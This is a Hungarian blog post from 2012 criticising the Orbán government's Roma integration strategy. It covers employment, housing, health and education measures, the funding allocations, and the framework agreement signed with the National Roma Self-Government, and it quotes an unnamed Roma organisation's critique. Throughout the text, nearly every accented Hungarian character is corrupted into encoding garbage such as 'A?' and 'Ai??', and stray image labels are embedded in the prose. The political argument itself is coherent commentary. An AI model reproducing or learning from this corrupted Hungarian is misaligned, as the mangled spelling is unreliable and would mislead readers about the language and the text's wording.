Az OrbA?n-kormA?ny roma stratAi??giA?ja – merre visz?

2012. április 5. csütörtök, 18:44Ujlaky András

0


Az OrbA?n-kormA?ny roma stratAi??giA?ja – merre visz?


English version ai??i??

Az elmA?lt Ai??v vAi??gAi??re elkAi??szA?lt Ai??s a kormA?ny elfogadta a vA?lasztA?sok A?ta vA?rt A?n. cigA?ny felzA?rkA?zA?si stratAi??giA?t. Csak emlAi??keztetAi??A?l, ennek a programnak, illetve az EU tAi??z Ai??ves roma stratAi??giA?jA?nak lAi??trehozA?sa volt a kormA?ny egyik sokat reklA?mozott cAi??lja. KA?r, hogy az eurA?pai pAi??nzA?gyi vA?lsA?g Ai??s azon belA?l a hazai gazdasA?gi problAi??mA?k teljesen a kAi??zAi??rdeklAi??dAi??s hA?tterAi??be szorAi??tottA?k ezeket a fontos dokumentumokat, holott azok, sajA?t ambiciA?zus A?llAi??tA?suk szerint, a lakossA?g kAi??zel egyharmadA?nak Ai??letAi??ben hozhatnak majd jelentAi??s vA?ltA?zA?st az elkAi??vetkezAi?? tAi??z Ai??vben. NAi??gy egymA?sra Ai??pA?lAi?? dokumentumrA?l van szA?: (1) maga a stratAi??gia, (2) az annak mellAi??kletAi??t kAi??pezAi?? helyzetelemzAi??s, (3) a miniszterelnAi??knek az OrszA?gos Roma Ai??nkormA?nyzat vezetAi??jAi??vel kAi??tAi??tt keretszerzAi??dAi??se Ai??s (4) a stratAi??gia elsAi?? kAi??t Ai??vAi??re a kormA?ny A?ltal elhatA?rozott, tAi??bbAi??-kevAi??sbAi?? konkrAi??t intAi??zkedAi??sek, melyekhez a hatA?rozat forrA?sokat is rendel. Jelen Ai??rA?s a nAi??gy dokumentum A?ltalA?nos A?ttekintAi??sAi??t, valamint az oktatA?sra vonatkozA? rAi??szek kicsit alaposabb vizsgA?latA?t vA?llalja, elAi??rebocsA?jtva, hogy a KAi??znevelAi??si tAi??rvAi??ny hatA?sA?t, annak vAi??grehajtA?sA?val kapcsolatos bizonytalansA?gok miatt egyelAi??re csak feltAi??telezni tudjuk.

A kormA?ny a Nemzeti TA?rsadalmi FelzA?rkA?zA?si StratAi??giA?jA?t ai??i?? nagyon helyesen ai??i?? mA?s fejlesztAi??si stratAi??giA?k Ai??s programok komplex rendszerAi??ben igyekszik elhelyezni.Ai??Az EU stratAi??gia, az (egyAi??bkAi??nt megszA?ntetett, majd A?jra indAi??tott) Legyen Jobb a Gyerekeknek program, a Semmelweis terv, a SzAi??ll KA?lmA?n Terv, az Asj SzAi??chenyi Terv, stb. Rengeteg jA?akaratra, sziszifuszi erAi??feszAi??tAi??sre lesz, lenne szA?ksAi??g a felzA?rkA?zA?si program eszmAi??it Ai??s cAi??lkitAi??zAi??seit, az esAi??lyegyenlAi??sAi??gi szempontokat a hazai programokon keresztA?l vezetni. Sajnos ennek az elsAi?? intAi??zkedAi??sekben (kormA?nyhatA?rozat) nem sok jele mutatkozik. E munka nAi??lkA?l ez a program is az A?n. Roma DekA?d (2005) sorsA?ra juthat, ami csendes kA?mA?ban hever. EmlAi??kszA?nk, akkor Medgyessy PAi??ter fA?jta a fanfA?rokat.

A legfontosabb dokumentum nyAi??lvA?n az EU Framework for National Roma Integration Strategies 2011-2020, amely mA?r az elsAi?? bekezdAi??sAi??ben mA?s felA?tAi??st alkalmaz, mint a miAi??nk. FelhAi??vja a figyelmet, hogy ai??za romA?kat kAi??rA?lvevAi?? elAi??Ai??tAi??let, intolerancia, diszkriminA?ciA? Ai??s kirekesztAi??sai??? nem tAi??rhetAi?? a XXI. szA?zad EurA?pA?jA?ban. KAi??vA?ncsian vA?rjuk, mit szA?l majd a BizottsA?g a mi stratAi??giA?nkhoz, mindenesetre nagy kA?r, hogy nem vA?llal nagyobb szerepet a programok megalkotA?sA?ban, vAi??grehajtA?sA?ban Ai??s monitorozA?sA?ban, hanem pont azokra a kormA?nyokra bAi??zza a feladatot, melyek Ai??vtizedek A?ta nyilvA?nvalA?an nem tudnak, vagy nem akarnak megbirkA?zni vele.

1. Annak ellenAi??re, hogy az EU Framework arra szA?lAi??tja fel a tagA?llamokat, hogy ai??zfocus on Roma in a clear and specific wayai???, a stratAi??gia egyszerre kAi??vA?nja kezelni a leszakadA? rAi??giA?k lakossA?gA?nak problAi??mA?jA?t, a gyerekszegAi??nysAi??get Ai??s a romA?k helyzetAi??t. BA?r jelentAi??s A?tfedAi??s van a hA?rom problAi??makAi??r A?ltal Ai??rintett cAi??lcsoportok kAi??zAi??tt Ai??s politikai meggondolA?sok indokolhatjA?k, hogy a stratAi??gia nem csak a cigA?nyok problAi??mA?it akarja orvosolni, az egyAi??rtelmAi?? fA?kusz hiA?nya veszAi??lyeztetheti a beavatkozA?sok sikeressAi??gAi??t, mindhA?rom cAi??lcsoport szempontjA?bA?l.

2. NAi??mi megkAi??nnyebbA?lAi??st okoz, hogy a stratAi??giA?t megalapozA? helyzetelemzAi??s megbAi??zhatA?, kiprA?bA?lt, A?ltalA?ban elfogadott statisztikai forrA?sokat, ismert kutatA?k ismert anyagainak adatait hasznA?lja. MegtalA?ljuk az EU, az UNDP, a VilA?gbank, az A?SZ adatait, valamint a legnevesebb magyar szerzAi??k (Kertesi, KAi??zdy, NemAi??nyi, stb.) roma kutatA?sainak hivatkozA?sait. Mivel a dokumentumok az ezekbAi??l az adatokbA?l levont kAi??vetkeztetAi??sekre Ai??pA?lnek, nyugodt lelkiismerettel A?llAi??thatjuk, hogy szilA?rd alapokra Ai??pAi??tenek.

3. A stratAi??gia egyik legnagyobb hiA?nyossA?ga, hogy (szemben az BizottsA?g anyagA?val) a romA?k tA?rsadalmi helyzetAi??t, bA?rmilyen jA?l elemzi is azt, mintegy termAi??szeti jelensAi??gkAi??nt kezeli – ai??zAi??gy talA?ltuk, amikor elAi??szAi??r partra szA?lltunkai???. Teljes egAi??szAi??ben figyelmen kAi??vA?l hagyja a tA?rsadalom Ai??s annak tagjai romA?kat egyre jobban elutasAi??tA? Ai??s kirekeszteni vA?gyA? magatartA?sA?t, nem elemzi az elutasAi??tA?s okait, Ai??sszetevAi??it, megjelenAi??si formA?it, kAi??vetkezmAi??nyeit. Ily mA?don nem is ad megoldA?sokat az elkAi??vetkezAi?? tAi??z Ai??vre a stratAi??gia A?ltal megcAi??lzott ai??zbefogadA? felzA?rkA?zA?sai??? legsA?lyosabb akadA?lyA?nak lekA?zdAi??sAi??re. Ez tA?volrA?l sem csak Ai??zlAi??s, vagy stAi??lus kAi??rdAi??se, hiszen a stratAi??gia vAi??grehajtA?sa szA?ksAi??gszerAi??en azokra a kAi??zponti Ai??s helyi kormA?nyzati tisztviselAi??kre, a szociA?lis Ai??s munkaA?gyi szolgA?ltatA?kra, A?vA?nAi??kre Ai??s pedagA?gusokra, egAi??szsAi??gA?gyi dolgozA?kra szA?mAi??t, akik nagy valA?szAi??nAi??sAi??ggel rendes Ai??s normA?lis tagjai a tA?rsadalomnak osztva annak romA?kkal kapcsolatos Ai??rtAi??krendjAi??t is. NAi??hA?ny A?rA?s kAi??pzAi??sek, hangzatos kijelentAi??sek, ahogy eddig sem, ezutA?n sem fognak majd szA?mottevAi?? vA?ltA?zA?st, eredmAi??nyt hozni. Erre a pontra kAi??sAi??bb mAi??g visszatAi??rA?nk, amikor elemezni prA?bA?ljuk a stratAi??gia polgA?rjogi szemlAi??letAi??nek hiA?nyA?t.

romastrategia3

4.Ai??A stratAi??gia tAi??rtAi??nelmi lehetAi??sAi??get mulaszt el, amikor az etnikai adatok felvAi??telAi??vel Ai??s kezelAi??sAi??vel kapcsolatban csak ezek lehetAi??sAi??gAi??nek vizsgA?latA?t tAi??zi ki cAi??lul, annak ellenAi??re, hogy a megoldA?sra tAi??bb megbAi??zhatA? javaslat kAi??szA?lt, pAi??ldA?ul a KisebbsAi??gi Jogok OrszA?ggyAi??lAi??si BiztosA?nak Ai??s az AdatvAi??delmi Biztosnak irodA?iban. Hogy a mai gyakorlat mennyire megbAi??zhatatlan, mutatjA?k a kisebbsAi??gi Ai??nkormA?nyzat-vA?lasztA?si regisztrA?ciA?val Ai??s az Ai??sztAi??ndAi??j-pA?lyA?zatokkal kapcsolatos visszaAi??lAi??sek tapasztalatai. HasonlA?an rosszak a tapasztalatok az elAi??zAi?? 2001 Ai??vi nAi??pszA?mlA?lA?s adatai.Ai??Ugyancsak megbAi??zhatatlan a halmozottan hA?trA?nyos helyzetAi?? gyerekek nyilvA?ntartA?sa (a definAi??ciA? szerint azok a gyerekek, akiknek csalA?dja rendszeres gyerekvAi??delmi tA?mogatA?sban rAi??szesA?lnek Ai??s a szA?lAi??k iskolai vAi??gzettsAi??ge nem tAi??bb mint 8 A?ltalA?nos). Mivel ezeknek az adatoknak a felvAi??tele sem teljes kAi??rAi?? Ai??s kAi??telezAi??, nyilvA?nvalA? manipulA?ciA?s lehetAi??sAi??gre ad mA?dot az illetAi??kes jegyzAi?? rAi??szAi??rAi??l.

MegfelelAi?? adatok hiA?nyA?ban pedig nem mAi??rhetAi?? a diszkriminA?ciA? valA?s szintje. De nem hatA?rozhatA? meg hatAi??konyan a beavatkozA?sok cAi??lcsoportja, sem azok eredmAi??nyAi??nek vizsgA?lata nem lehetsAi??ges.

5.Ai??A cigA?nyok kisebbsAi??gi jogainak vAi??delmAi??vel kapcsolatban, melyeknek a stratAi??gia azAi??rt biztosAi??t helyet, szokA?s szerint bA?szkAi??n felsorolja az intAi??zmAi??nyrendszert, az EgyenlAi?? BA?nA?smA?drA?l szA?lA? tAi??rvAi??nyt, az EgyenlAi?? BA?nA?smA?d HatA?sA?got, valamint azt a tAi??nyt, hogy a megszAi??nAi?? KisebbsAi??gi Jogok OrszA?ggyAi??lAi??si BiztosA?nak feladatait az A?ltalA?nos Ombudsman veszi A?t. SzA?val sem emlAi??ti azonban, hogy 2003 (az EBKTV hatA?lyba lAi??pAi??se) A?ta sem a kAi??zponti, sem a helyi Ai??nkormA?nyzatok nem indAi??tottak egyetlen A?gyet sem a cigA?nygyerekek iskolai szegregA?ciA?ja, romA?kat Ai??rt munkahelyi diszkriminA?ciA?, roma kAi??zAi??ssAi??gek Ai??s egyAi??nek zaklatA?sa miatt. Nem indAi??tott hivatalbA?l vizsgA?latot a HatA?sA?g sem, az Ombudsman rendszeres elmarasztalA? eredmAi??nyAi?? vizsgA?latainak Ai??s hatA?rozatainak pedig nincsen jogi kAi??vetkezmAi??nye. A romA?k jogainak A?llami vAi??delmAi??t nehAi??z megkerA?lni, mAi??g, ha ez politikailag kAi??nyelmetlen is. A cigA?nygyerekek iskolai szegregA?ciA?jA?nak A?gyAi??ben indAi??tott ai??i?? kivAi??tel nAi??lkA?l sikeres – perek mutatjA?k, hogy az Ai??nkormA?nyzatok, iskolA?k nincsenek tisztA?ban az EBKTV elAi??Ai??rA?saival Ai??s, mivel azokat senki nem kAi??ri rajtuk, szA?mon rendszeresen Ai??s intAi??zmAi??nyesen, akkor sem alkalmaznak integrA?ciA?s oktatA?sszervezAi??si technikA?kat, ha arra egyAi??bkAi??nt lenne lehetAi??sAi??g. SA?lyos hiA?nyossA?ga a stratAi??giA?nak, hogy a romA?k A?llampolgA?ri jogainak, biztonsA?gA?nak aktAi??v vAi??delmAi??t nem tAi??zi ki cAi??lkAi??nt, holott bebizonyosodott, hogy a tAi??rvAi??nyek elfogadA?sa nem elegendAi??, azokat vAi??gre is kell hajtatnia az A?llamnak.

Nem lA?thatA? az anyagbA?l az sem, hogy a stratAi??gia Ai??lni kAi??vA?nna, szA?ksAi??gszerAi??en tovA?bb fejlesztve azt, az elAi??zAi?? kormA?nyzatok egyetlen szellemes kAi??nyszerAi??tAi?? intAi??zkedAi??sAi??vel, esAi??lyegyenlAi??sAi??gi terv elkAi??szAi??tAi??sAi??hez kAi??tve az Ai??nkormA?nyzatok szA?mA?ra az uniA?s fejlesztAi??si forrA?sokhoz valA? hozzA?fAi??rAi??st.

6. A dokumentumok fontos elemAi??nek van jelezve a MiniszterelnAi??k Ai??s az ORAi?? vezetAi??jAi??nek keretszerzAi??dAi??se. FeltAi??telezhetAi??, hogy ez a papAi??r esetleg a BizottsA?g A?ltal elvA?rt szAi??les kAi??rAi?? roma rAi??szvAi??telt hivatott reprezentA?lni (helyettesAi??teni) a stratAi??gia kialakAi??tA?sa Ai??s vAi??grehajtA?sa sorA?n. Az sincs kizA?rva, hogy esetleg alibinek hasznA?lhatA? a vAi??grehajtA?s sorA?n jelentkezAi?? nehAi??zsAi??gek esetAi??n, vagy ezzel gondolja helyettesAi??teni a stratAi??gia tA?rsadalmi vitA?jA?t.

Hadd mellAi??keljek, legalA?bbis egyes cigA?nyok vAi??lemAi??nyAi??t illusztrA?landA?, egy Ai??rtAi??kelAi??st, melyet a dokumentum alA?Ai??rA?sa utA?n terjesztett egy magA?t meg nem nevezAi?? roma szervezet:

ai??zNAi??hA?ny nappal ezelAi??tt a Magyar kormA?ny nagy csinnadrattA?val jelentette be egy fontos dokumentum alA?Ai??rA?sA?t, mely befolyA?solja majd a roma kisebbsAi??g jAi??vAi??jAi??t. A dokumentumot a miniszterelnAi??k elAi??szAi??r A?prilis 7.-i beszAi??dAi??ben emlAi??tette, melyet az A?j EU roma program bemutatA?sa alkalmA?bA?l tartott. Mivel a romA?k foglalkoztatA?si, oktatA?si, lakhatA?si Ai??s egAi??szsAi??gA?gyi helyzetAi??re vonatkozA?an kormA?nypolitika irA?nyai Ai??s tartalma immA?r egy Ai??ve kAi??snek, a dokumentumot nagy vA?rakozA?s elAi??zte meg. Sajnos csalA?dA?st okoz.

ElAi??szAi??r is a dokumentum jogi zsA?nere nehezen meghatA?rozhatA?. SemmikAi??ppen nem keret megA?llapodA?s, aminek nevezi magA?t, hiszen nem kAi??pezi keretAi??t kAi??sAi??bbi szerzAi??dAi??ses kAi??telezettsAi??gekre vonatkozA? jogviszonyoknak. Nem mondhatA? szA?ndAi??knyilatkozatnak sem, mivel nem tartalmaz a felek A?ltal megvalA?sAi??tani kAi??vA?nt szakpolitikai intAi??zkedAi??seket, beavatkozA?sokat. Nem tartalmaz kAi??telezettsAi??gvA?llalA?st egyik fAi??l rAi??szAi??rAi??l sem. LeginkA?bb egy politikai pamflet, mely kAi??vA?natos Ai??s dicsAi??retes cAi??lkitAi??zAi??seket tartalmaz a kAi??zeljAi??vAi?? szA?mA?ra, melyet kAi??t politikus alA? is Ai??rt.

romastrategia-orban-farkas

Az alA?Ai??rA?k kAi??zA?l a MiniszterelnAi??kAi??t nem kell bemutatni. Farkas FlA?riA?n az OrszA?gos Roma Ai??nkormA?nyzat rAi??szAi??rAi??l ellentmondA?sosabb. FIDESZ kAi??pviselAi??kAi??nt A?l az OrszA?ggyAi??lAi??sben a harmadik vA?lasztA?si periA?dusban Ai??s KormA?nybiztos, feladata ellenAi??rizni azoknak a fejlesztAi??si pAi??nzeknek az elosztA?sA?t, melyek a romA?k helyzetAi??t hivatottak javAi??tani. Aligha mondhatA? a cigA?nyok autonA?m Ai??s fA?ggetlen kAi??pviselAi??jAi??nek, a MiniszterelnAi??k a munkaadA?ja Ai??s a fAi??nAi??ke. Farkas A?r ezen kAi??vA?l elAi??tAi??lt bAi??nAi??zAi??, Ai??tAi??letAi??t romA?knak szA?nt fejlesztAi??si forrA?sok elsikkasztA?sA?nak, szabadsA?gA?t elnAi??ki kegyelemnek kAi??szAi??nheti.

Az orszA?gos Roma Ai??nkormA?nyzat sem mondhatA? ideA?lis szerzAi??dAi?? fAi??lnek. BA?r tAi??bbAi??-kevAi??sbAi?? demokratikus vA?lasztA?s A?tjA?n jAi??n lAi??tre, nincsenek kormA?nyzati jogai Ai??s kAi??telezettsAi??gei, nincs Ai??nA?llA? bevAi??tele, fA?ggetlen kAi??ltsAi??gvetAi??se, szakAi??rtAi??i. EgyszerAi??en megfogalmazva, nincsen abban a helyzetben, hogy bA?rmilyen kAi??telezettsAi??get vA?llaljon.

NAi??zzA?k a dokumentum tartalmA?t. AmbiciA?zus cAi??lokat tAi??z ki az elkAi??vetkezAi?? hA?rom Ai??vre: 100Ai??000 roma munkA?ba A?llAi??tA?sa, tAi??bb tAi??zezer roma szakkAi??pzAi??se piackAi??pes szakmA?kban, szakiskolA?kban, a felnAi??ttkAi??pzAi??s keretAi??ben. Ai??s egy igazA?n A?j, nagyon kAi??vA?natos cAi??l, 10Ai??000 roma fiatal leAi??rettsAi??giztetAi??se.

Ami hiA?nyzik, adatok, hogy ezek a cAi??lok milyen Ai??rtAi??kekhez kAi??pest Ai??rendAi??k el. Hogyan lehet a cAi??lcsoport tagjait kivA?lasztani? Milyen szakpolitikai intAi??zkedAi??sek, beavatkozA?sok, megerAi??sAi??tAi?? intAi??zkedAi??sek teszik majd lehetAi??vAi?? a cAi??lok elAi??rAi??sAi??t. Milyen pAi??nzeszkAi??zAi??k A?llnak rendelkezAi??sre az intAi??zkedAi??sekhez? Mely kormA?nyzati hivatalok felelAi??ssAi??ge az intAi??zkedAi??sek vAi??grehajtA?sa? VAi??gA?l, hogyan lesznek ellenAi??rizhetAi??k az intAi??zkedAi??sek? .

Megnyugodhatunk, a dokumentum nem mA?s, mint aminek lA?tszik, porhintAi??s. Nem takarAi??tja meg azt a kemAi??ny Ai??s kreatAi??v munkA?t, amit a kormA?nynak elAi??bb-utA?bb be kell fektetnie, ha komolyan veszi cAi??lkitAi??zAi??sAi??t Ai??s segAi??teni akar a romA?k tarthatatlan helyzetAi??n. Ez a dokumentum arra sem elegendAi??, hogy kAi??sAi??bb a romA?kat lehessen hibA?ztatni a helyzet vA?ltozatlansA?gA?Ai??rt, mint az elAi??zAi?? kormA?nyok tettAi??k. ai??z

Most pedig tAi??rjA?nk A?t a stratAi??gia tartalmi elemeire, valamint azok megjelenAi??sAi??re az elkAi??vetkezAi?? kAi??t Ai??v kormA?nyzati intAi??zkedAi??seiben:

1. NyilvA?nvalA?an legfontosabb rAi??sze a mAi??ltA?nyos jAi??vedelmet biztosAi??tA?, kAi??zterheket fizetAi?? legA?lis foglalkoztatA?s biztosAi??tA?sa a program cAi??lcsoportja rAi??szAi??re, kA?lAi??nAi??s tekintettel az OrbA?n-kormA?ny egymilliA? munkahely teremtAi??sAi??t elAi??irA?nyozA? programjA?ra.

MeglepAi?? mA?don a stratAi??gia szinte kizA?rA?lag a munkaerAi??piac kAi??nA?lati oldalA?val foglalkozik, elsAi??sorban a segAi??lyezAi??si rendszer reformjA?val. NehAi??z nem egyetAi??rteni azzal az A?llAi??tA?ssal, hogy a segAi??lyek, a segAi??lyezAi??si kultA?ra nem fAi??kezhetik a romA?k munkavA?llalA?sA?t sem. Ez az A?llAi??tA?s azonban sA?lyos egyszerAi??sAi??tAi??s, a munkakAi??pes segAi??lyezettek jelentAi??s rAi??sze tAi??bb-kevesebb rendszeressAi??ggel napszA?moskAi??nt, egyAi??ni vA?llalkozA?kAi??nt dolgozik a fekete Ai??s szA?rkegazdasA?gban. MeglepAi??, hogy a helyzetjelentAi??s ezt a szempontot teljesen figyelmen kAi??vA?l hagyja. Sem a feketemunka kiterjedtsAi??gAi??rAi??l nem kAi??zAi??l adatokat, sem megoldA?si javaslatokat nem kAi??nA?l. PusztA?n a feketemunka kifehAi??rAi??tAi??se jelentAi??s vA?ltozA?st eredmAi??nyezne a munkapiaci statisztikA?ban, megkezdhetnAi?? visszaszorAi??tani a romA?k munkakerA?lAi??kAi??nt valA? megbAi??lyegzAi??sAi??t. Sajnos ai??i?? Ai??rthetetlen mA?don ai??i?? egyelAi??re a stratAi??gia is elfogadni tAi??nik sokak igazA?n torz Ai??rvelAi??sAi??t, miszerint ez a megoldA?s veszAi??lyeztetnAi?? egAi??sz szektorok (mezAi??gazdasA?g, Ai??pAi??tAi??ipar) ai??zversenykAi??pessAi??gAi??tai???.

MA?s, a munkaerAi?? keresletet Ai??sztAi??nzAi?? Ai??s esAi??lykiegyenlAi??tAi?? intAi??zkedAi??seket nem tervez az anyag az elkAi??vetkezAi?? tAi??z Ai??vre sem. Ilyenek lehetnAi??nek a kvA?tA?k a kormA?nyzati Ai??s Ai??nkormA?nyzati foglalkoztatA?sban, a nagy szolgA?ltatA? rendszerekben, A?llami vA?llalatoknA?l, kvA?tA?k az A?llami szA?llAi??tA?si szerzAi??dAi??seket elnyerAi?? magA?n vA?llalatoknA?l, stb.

romastrategia-ciganyok-munkaban

A hangsA?ly a nagy nyilvA?nossA?got nyert tAi??meges kAi??zfoglalkoztatA?si programokon van, melyek gazdasA?gossA?gA?t, hatAi??konysA?gA?t ismert szA?mAi??tA?sok nem igazoljA?k, ugyanakkor messzemenAi??en ellentmondanak a stratAi??gia csalA?d Ai??s gyerek kAi??zpontA? cAi??lkitAi??zAi??seinek. AdA?s a program a kAi??zfoglalkoztatA?sbA?l a piaci foglalkoztatA?sba valA? A?tmenet lehetAi??sAi??geinek elemzAi??sAi??vel is.

Ezzel egyA?tt EU forrA?sokbA?l kA?lAi??nbAi??zAi??, meg nem hatA?rozott munkaerAi??-piaci programokra tAi??bb mint 80Ai??000 milliA? forintot kA?lAi??nAi??t el a program. Csak remAi??lhetjA?k, hogy elkerA?lik a korA?bbi hasonlA? programok csapdA?jA?t, olyan ai??i?? egyAi??bkAi??nt papAi??ron jA?l mutatA? – kAi??pzAi??sek szervezAi??sAi??t, ahol a kAi??pzAi??k semmilyen felelAi??ssAi??ggel nem tartoztak a kAi??pzettek foglalkoztatA?sA?val kapcsolatban. Emiatt is lehet ugyanis A?ltalA?nos a tapasztalat, hogy a romA?k A?ltal a kAi??pzAi??seken szerzett elsAi??, mA?sodik, sokadik szakmA?ra nincsen munkapiaci kereslet.

2. A lakhatA?ssal kapcsolatos stratAi??giai cAi??lkitAi??zAi??sek sA?lyos csalA?dA?st okoznak. SzAi??p szavakon Ai??s A?ltalA?nossA?gokon kAi??vA?l az anyag nem tAi??zi ki cAi??lkAi??nt a helyzet konkrAi??t javAi??tA?sA?t. SAi??t, az elkAi??vetkezAi?? tAi??z Ai??vre nyAi??ltan lemond a cigA?nytelepek, nyomornegyedek, szegregA?tumok felszA?molA?sA?rA?l, azok ai??zlakhatA?bbA?ai??? tAi??telAi??t fogalmazza meg cAi??lkitAi??zAi??skAi??nt. MAi??g azzal a lAi??pAi??ssel is adA?s marad, hogy rendezze a de facto lakA? terA?letek Ai??s az Ai??nkormA?nyzatok jog viszonyA?t azokban az esetekben, amikor a cigA?nytelep a telepA?lAi??s kAi??rzethatA?rA?n kAi??vA?l esik Ai??s ezAi??rt az Ai??nkormA?nyzat nem tartja magA?t illetAi??kesnek a szA?ksAi??ges szolgA?ltatA?sok biztosAi??tA?sA?ra.

3. Ugyanez mondhatA? a stratAi??gia egAi??szsAi??gA?gyi cAi??lkitAi??zAi??seire is, sAi??t a leAi??rA?s teljes egAi??szAi??ben figyelmen kAi??vA?l hagyja azt a jelentAi??s kAi??zegAi??szsAi??gA?gyi, jA?rvA?nyA?gyi kockA?zatot, mely a telepek szabA?lyozatlan, kAi??zmAi??- Ai??s egyAi??b szolgA?ltatA?sok nAi??lkA?li nAi??vekedAi??sAi??bAi??l kAi??vetkezik.

4. A munkahelyteremtAi??sen kAi??vA?l az oktatA?s terA?letAi??n tette a KormA?ny a legjelentAi??sebb szA?mszerAi?? Ai??gAi??reteket a romA?knak: 20Ai??000 piackAi??pes szakmunkA?s igazolvA?ny, 10Ai??000 Ai??rettsAi??gi, 5000 diploma, mindezt a keretszerzAi??dAi??s szerint 2015-ig. Tekintettel arra, hogy a stratAi??gia elfogadA?sA?val pA?rhuzamosan zajlik az elmA?lt idAi??k legjelentAi??sebb reformja a kAi??zoktatA?sban, akA?r ebbe illeszkedhetne is az Ai??gAi??ret.

Sajnos A?gy tAi??nik, hogy a kormA?ny ahelyett, hogy szAi??lesebb kAi??rben kAi??vA?nnA? az egyre magasabb szAi??nvonalA? tudA?st terjeszteni, inkA?bb erAi??sAi??teni, intAi??zmAi??nyesAi??teni kAi??vA?nja a PISA Ai??s hazai felmAi??rAi??sek alapjA?n az oktatA?si rendszer legtAi??bbet kritizA?lt sajA?tossA?gA?t, azt, hogy a szA?lAi??k tA?rsadalmi-gazdasA?gi stA?tusza minden mA?s orszA?gAi??nA?l nagyobb mAi??rtAi??kben hatA?rozza meg a gyerekek iskolai teljesAi??tmAi??nyAi??t Ai??s tovA?bbtanulA?suk irA?nyA?t. Nem lAi??p fel az A?ltalA?nos iskolai szegregA?ciA?val szemben, csAi??kkenti a tankAi??telezettsAi??g idejAi??t, erAi??sAi??ti a kAi??zAi??piskolai szelekciA?t. A kAi??znevelAi??si tAi??rvAi??ny ezen elsAi??dleges intAi??zkedAi??seit valA?szAi??nAi??leg csak erAi??sAi??ti majd az a bizonytalansA?g, amely a tanA?gy igazgatA?si reformjA?nak kAi??vetkezmAi??nye Ai??s ugyanAi??gy a normatAi??v finanszAi??rozA?s visszaszorulA?sa is.

romastrategia-oktatas

Igazi pozitAi??v intAi??zkedAi??s viszont a gyerekek A?vodA?ztatA?sA?nak biztosAi??tA?sa 3 Ai??ves kortA?l. A kormA?nyhatA?rozat intAi??zkedik is arrA?l, hogy 2013 vAi??gAi??ig biztosAi??tsA?k a szA?ksAi??ges fAi??rAi??helyeket minden olyan helyen, ahol a halmozottan hA?trA?nyos helyzetAi?? gyerekek szA?mA?ra nem A?ll rendelkezAi??sre kapacitA?s. KAi??ltsAi??gvetAi??si forrA?st azonban erre nem biztosAi??t, Ai??s nem kA?lAi??nAi??t el meghatA?rozott Ai??sszeget a RegionA?lis OperatAi??v ProgrambA?l sem erre a cAi??lra.

A HatA?rozat kAi??t Ai??vre 7Ai??590 milliA? forintot rendel TA?MOP forrA?sokbA?l a tanodA?k Ai??s mA?sodik esAi??ly iskolA?k tA?mogatA?sA?ra. NehAi??z eldAi??nteni, mennyire adekvA?t ez az Ai??sszeg, hiszen az utA?bbi intAi??zmAi??nyek eddig normA?l fejkvA?tA?val A?zemeltek Ai??s nem derA?l ki, hogy a hatA?rozat ezt kiegAi??szAi??teni, vagy helyettesAi??teni szA?ndAi??kozik-e? Az elismerten sikeres tanodai hA?lA?zat, tAi??bb Ai??ves szA?net utA?n ismAi??t pA?lyA?zati pAi??nzhez jut, de termAi??szetesen csak azok az intAi??zmAi??nyek, melyek mAi??g talpon maradtak.Ai??A program tehA?t ismAi??t elmulasztja a lehetAi??sAi??get, hogy normatAi??v finanszAi??rozA?st biztosAi??tson egy bevA?lt felzA?rkA?ztatA? programhoz.

Ugyanakkor Ai??sszesen 2Ai??923 milliA? forint jut roma Ai??sztAi??ndAi??j programokra, tA?mogatja a hatA?rozat a roma szakkollAi??giumokat Ai??s kA?lAi??n programot kAi??vA?n indAi??tani a pedagA?guskAi??pzAi??sben a szegAi??nyek s romA?k oktatA?sA?hoz szA?ksAi??ges kompetenciA?k elsajA?tAi??tA?sA?hoz. 6Ai??837 milliA? forint jut az integrA?ciA?s Ai??s kAi??pessAi??g kibontakoztatA? kAi??pzAi??s fejlesztAi??sAi??re a programban rAi??szt vevAi?? intAi??zmAi??nyekben dolgozA?k fizetAi??s kiegAi??szAi??tAi??sAi??nek formA?jA?ban. A program tehA?t a minAi??sAi??gi oktatA?s premizA?lA?sa helyet inkA?bb fizeti a ai??zfAi??lelem bAi??rAi??tai???.

KAi??t TA?MOP-programbA?l Ai??sszesen 22Ai??140 milliA? forinttal tA?mogatnA?k a telepA?lAi??si szegregA?tumokban Ai??s hA?trA?nyos helyzetAi?? tAi??rsAi??gekben az egAi??sz napos iskolA?k Ai??s kollAi??giumok lAi??trehozA?sA?t. Tekintettel az Ai??sszeg nagysA?gA?ra lehet, hogy, hogy itt lA?tjuk a romA?knak Ai??gAi??rt oktatA?si felzA?rkA?zA?s eszkAi??zAi??t, masszAi??v, bentlakA?sos szegregA?lt intAi??zmAi??nyeket?

5. A gyermek jA?lAi??ttel kapcsolatos intAi??zkedAi??sek lAi??nyegAi??ben megismAi??tlik korA?bbi programok cAi??lkitAi??zAi??seit. JelentAi??s Ai??sszegeket kAi??vA?nnak kAi??lteni A?j Biztos Kezdet GyerekhA?zakra Ai??s gyerekAi??tkeztetAi??sre. A gyerekjA?lAi??ti intAi??zkedAi??sek kAi??zAi?? sikerA?lt beilleszteni egy A?j, fiatalkorA?aknak nyitandA? bAi??rtAi??n lAi??tesAi??tAi??sAi??t a nyugat-magyarorszA?gi rAi??giA?ban.

6. A kormA?nyhatA?rozatban talA?lhatA? intAi??zkedAi??sekre az elkAi??vetkezAi?? kAi??t Ai??vben elkA?lAi??nAi??tett forrA?sok tA?lnyomA?rAi??szt a RegionA?lis OperatAi??v Programok, a TA?MOP, a TIOP, a GOP, az A?ROP prioritA?saibA?l szA?rmaznak. A finanszAi??rozA?kAi??nt megjelAi??lt programelemek A?tfedAi??sei miatt azonban egyelAi??re nem A?tlA?thatA?, hogy az egyes konkrAi??t intAi??zkedAi??sekre pontosan mennyi pAi??nzt szA?n a KormA?ny. Arra sincs jel, mennyiben kAi??vA?nja ezt a hatalmas programot kitenni a pA?lyA?zati rendszer bA?rokrA?ciA?jA?nak, nehAi??zkessAi??gAi??nek, illetve kAi??vA?nja kAi??zponti programkAi??nt megvalA?sAi??tani.

Mindezek alapjA?n a cAi??mben megfogalmazott kAi??rdAi??sre, hogy hovA? vezet a stratAi??gia, nem lehet mA?s a vA?laszom: kAi??rbe-kAi??rbe. Vajon ez megfelel majd az EU-nak, valA?ban ezt akarjA?k finanszAi??rozni?

De ami ennAi??l is fontosabb: vajon szolgA?lja-e majd a romA?k tA?rsadalmi integrA?ciA?jA?t, felemelkedAi??sAi??t?

ForrA?s: http://hazaeshaladas.blog.hu/

